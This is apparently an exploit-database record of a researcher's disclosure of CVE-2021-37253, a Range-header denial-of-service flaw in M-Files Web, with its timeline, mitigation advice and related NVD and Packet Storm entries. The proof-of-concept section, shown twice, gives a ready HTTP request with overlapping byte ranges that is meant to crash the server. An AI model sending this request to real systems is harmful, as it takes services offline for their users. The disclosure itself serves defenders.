M-Files Web versions prior to 20.10.9524.1 and M-Files Web versions prior to 20.10.9445.0 contain an improper range header processing vulnerability. A remote unauthenticated attacker may send crafted requests with overlapping ranges (via HTTP requests with a specially-crafted Range or Request-Range headers) to cause the web application to compress each of the requested bytes, resulting in a crash due to excessive memory and CPU consumption and preventing users from accessing the system.
{"id": "1337DAY-ID-37094", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "M-Files Web Denial Of Service Vulnerability", "description": "M-Files Web versions prior to 20.10.9524.1 and M-Files Web versions prior to 20.10.9445.0 contain an improper range header processing vulnerability. A remote unauthenticated attacker may send crafted requests with overlapping ranges (via HTTP requests with a specially-crafted Range or Request-Range headers) to cause the web application to compress each of the requested bytes, resulting in a crash due to excessive memory and CPU consumption and preventing users from accessing the system.", "published": "2021-12-04T00:00:00", "modified": "2021-12-04T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://0day.today/exploit/description/37094", "reporter": "Murat Aydemir", "references": [], "cvelist": ["CVE-2021-37253"], "immutableFields": [], "lastseen": "2021-12-09T06:08:03", "viewCount": 196, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-37253"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165139"]}], "rev": 4}, "score": {"value": 5.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-37253"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165139"]}]}, "exploitation": null, "vulnersScore": 5.7}, "sourceHref": "https://0day.today/exploit/37094", "sourceData": "I. SUMMARY\n=============================================================================================================================================================\nTitle: M-Files Web Improper Range Header Processing Denial of Services\n(DoS) Vulnerability\nProduct: M-Files Web version before 20.10.9524.1, M-Files Web version\nbefore 20.10.9445.0\nVulnerability Type(s): Denial of Services (DoS)\nCredit by/Researcher: Murat Aydemir (Turkey)\nContact: https://twitter.com/mrtydmr75\nGithub: https://github.com/murataydemir\n=============================================================================================================================================================\n\nII. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES\n=============================================================================================================================================================\nCVE Number: CVE-2021-37253\nCVSSv3 Score: 4.3\nCVSSv3 Vector: CVSS:4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)\nSeverity: Medium\nConfidentiality Impact: None (There is no impact to the confidentiality of\nthe system)\nIntegrity Impact: None (There is no impact to the integrity of the system)\nAvailability Impact: Complete (There is a total shutdown of the affected\nresource. The attacker can render the resource completely unavailable)\nAccess Complexity: Low (Specialized access conditions or extenuating\ncircumstances do not exist. Very little knowledge or skill is required to\nexploit)\nAuthentication: Not required (Authentication is not required to exploit the\nvulnerability)\nGained Access: None\nVulnerability Type(s): Denial of Services (DoS)\nCWE ID: CWE-399 Resource Management Errors (\nhttps://cwe.mitre.org/data/definitions/399.html)\n=============================================================================================================================================================\n\nIII. TIMELINE\n=============================================================================================================================================================\nContact to Vendor: the 24th of August, 2020\nVendor (M-Files) Reply: the 3rd of November, 2020 (rejected vulnerability)\nContact to Vendor: the 4th of November, 2020 (provide additional\ninformations & some of proof of concepts)\nVendor (M-Files) Reply: the 6th of November, 2020 (accepted vulnerability\nand ask time to fix)\nVendor (M-Files) Reply: the 4th of August, 2021 (inform me that \"we're\naccepting this vulnerability but we'll not give an effort to fix that and\nalso will not apply any CVE for this vuln.\")\nContact to MITRE: the 4th of August, 2021 (contacted MITRE and applied for\nCVE. MITRE has reserved CVE to me for this vulnerability)\n=============================================================================================================================================================\n\nIV. DESCRIPTION & MITIGATION\n=============================================================================================================================================================\nM-Files Web version before 20.10.9524.1 and M-Files Web version before\n20.10.9445.0 contain an Improper Range Header Processing Vulnerability. A\nremote unauthenticated attacker may send crafted requests with overlapping\nranges (via HTTP requests with a specially-crafted Range or Request-Range\nheaders) to cause the web application to compress each of the requested\nbytes, resulting in a crash due to excessive memory and CPU consumption and\npreventing users from accessing the system.\n\nEven if this vulnerability (CVE-2021-37253) has been verified and accepted\nby the Vendor (M-Files), their security team also contacted me and informed\nme that no effort will be given to fixing this vulnerability. Thus, there\nis no active patch, update or mitigation plan for CVE-2021-37253\nvulnerability. These are not exactly fix the problem (maybe just\nremediation), however I strongly recommend you to restrict IP addresses for\nweb applications which incoming requests/clients or reconfigure the web\nserver for \"Byte-range Request Segment Size\" as soon as possible.\n=============================================================================================================================================================\n\nV. PROOF OF CONCEPT (POC) FOR CVE-2021-37253\n=============================================================================================================================================================\nThis is easy to detect and exploit for this vulnerability. Just find a\nstatic content (such as .png, .jpg, .jpeg, .js, .css and so on) and make a\nrequest as follows.\n\nGET /Icons/Standard/Listing/VaultMounting.png HTTP/1.1\nHost: <host>\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0)\nGecko/20100101 Firefox/79.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3\nConnection: close\nRange:\nbytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-\n\nNote: this issue is valid and easly reproducable for all static assests\n(which has .png, .jpg, .jpeg, .js, .css, .gif extensions and so on)\n=============================================================================================================================================================\n\nVI. REFERENCE(S)\n=============================================================================================================================================================\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37253\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-37253\n=============================================================================================================================================================\n", "category": "dos / poc", "verified": true, "_state": {"dependencies": 1646472113}}
{"cve": [{"lastseen": "2022-03-31T19:15:40", "description": "** DISPUTED ** M-Files Web before 20.10.9524.1 allows a denial of service via overlapping ranges (in HTTP requests with crafted Range or Request-Range headers). NOTE: this is disputed because the range behavior is the responsibility of the web server, not the responsibility of the individual web application.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-05T21:15:00", "type": "cve", "title": "CVE-2021-37253", "cwe": ["CWE-444"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37253"], "modified": "2022-03-31T16:30:00", "cpe": [], "id": "CVE-2021-37253", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-37253", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-12-03T17:33:02", "description": "", "cvss3": {}, "published": "2021-12-03T00:00:00", "type": "packetstorm", "title": "M-Files Web Denial Of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-37253"], "modified": "2021-12-03T00:00:00", "id": "PACKETSTORM:165139", "href": "https://packetstormsecurity.com/files/165139/M-Files-Web-Denial-Of-Service.html", "sourceData": "`I. SUMMARY \n============================================================================================================================================================= \nTitle: M-Files Web Improper Range Header Processing Denial of Services \n(DoS) Vulnerability \nProduct: M-Files Web version before 20.10.9524.1, M-Files Web version \nbefore 20.10.9445.0 \nVulnerability Type(s): Denial of Services (DoS) \nCredit by/Researcher: Murat Aydemir (Turkey) \nContact: https://twitter.com/mrtydmr75 \nGithub: https://github.com/murataydemir \n============================================================================================================================================================= \n \nII. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES \n============================================================================================================================================================= \nCVE Number: CVE-2021-37253 \nCVSSv3 Score: 4.3 \nCVSSv3 Vector: CVSS:4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L) \nSeverity: Medium \nConfidentiality Impact: None (There is no impact to the confidentiality of \nthe system) \nIntegrity Impact: None (There is no impact to the integrity of the system) \nAvailability Impact: Complete (There is a total shutdown of the affected \nresource. The attacker can render the resource completely unavailable) \nAccess Complexity: Low (Specialized access conditions or extenuating \ncircumstances do not exist. Very little knowledge or skill is required to \nexploit) \nAuthentication: Not required (Authentication is not required to exploit the \nvulnerability) \nGained Access: None \nVulnerability Type(s): Denial of Services (DoS) \nCWE ID: CWE-399 Resource Management Errors ( \nhttps://cwe.mitre.org/data/definitions/399.html) \n============================================================================================================================================================= \n \nIII. TIMELINE \n============================================================================================================================================================= \nContact to Vendor: the 24th of August, 2020 \nVendor (M-Files) Reply: the 3rd of November, 2020 (rejected vulnerability) \nContact to Vendor: the 4th of November, 2020 (provide additional \ninformations & some of proof of concepts) \nVendor (M-Files) Reply: the 6th of November, 2020 (accepted vulnerability \nand ask time to fix) \nVendor (M-Files) Reply: the 4th of August, 2021 (inform me that \"we're \naccepting this vulnerability but we'll not give an effort to fix that and \nalso will not apply any CVE for this vuln.\") \nContact to MITRE: the 4th of August, 2021 (contacted MITRE and applied for \nCVE. MITRE has reserved CVE to me for this vulnerability) \n============================================================================================================================================================= \n \nIV. DESCRIPTION & MITIGATION \n============================================================================================================================================================= \nM-Files Web version before 20.10.9524.1 and M-Files Web version before \n20.10.9445.0 contain an Improper Range Header Processing Vulnerability. A \nremote unauthenticated attacker may send crafted requests with overlapping \nranges (via HTTP requests with a specially-crafted Range or Request-Range \nheaders) to cause the web application to compress each of the requested \nbytes, resulting in a crash due to excessive memory and CPU consumption and \npreventing users from accessing the system. \n \nEven if this vulnerability (CVE-2021-37253) has been verified and accepted \nby the Vendor (M-Files), their security team also contacted me and informed \nme that no effort will be given to fixing this vulnerability. Thus, there \nis no active patch, update or mitigation plan for CVE-2021-37253 \nvulnerability. These are not exactly fix the problem (maybe just \nremediation), however I strongly recommend you to restrict IP addresses for \nweb applications which incoming requests/clients or reconfigure the web \nserver for \"Byte-range Request Segment Size\" as soon as possible. \n============================================================================================================================================================= \n \nV. PROOF OF CONCEPT (POC) FOR CVE-2021-37253 \n============================================================================================================================================================= \nThis is easy to detect and exploit for this vulnerability. Just find a \nstatic content (such as .png, .jpg, .jpeg, .js, .css and so on) and make a \nrequest as follows. \n \nGET /Icons/Standard/Listing/VaultMounting.png HTTP/1.1 \nHost: <host> \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) \nGecko/20100101 Firefox/79.0 \nAccept: application/json, text/javascript, */*; q=0.01 \nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 \nConnection: close \nRange: \nbytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0- \n \nNote: this issue is valid and easly reproducable for all static assests \n(which has .png, .jpg, .jpeg, .js, .css, .gif extensions and so on) \n============================================================================================================================================================= \n \nVI. REFERENCE(S) \n============================================================================================================================================================= \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37253 \nhttps://nvd.nist.gov/vuln/detail/CVE-2021-37253 \n============================================================================================================================================================= \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165139/mfiles-dos.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}
M-Files Web Denial Of Service Vulnerability
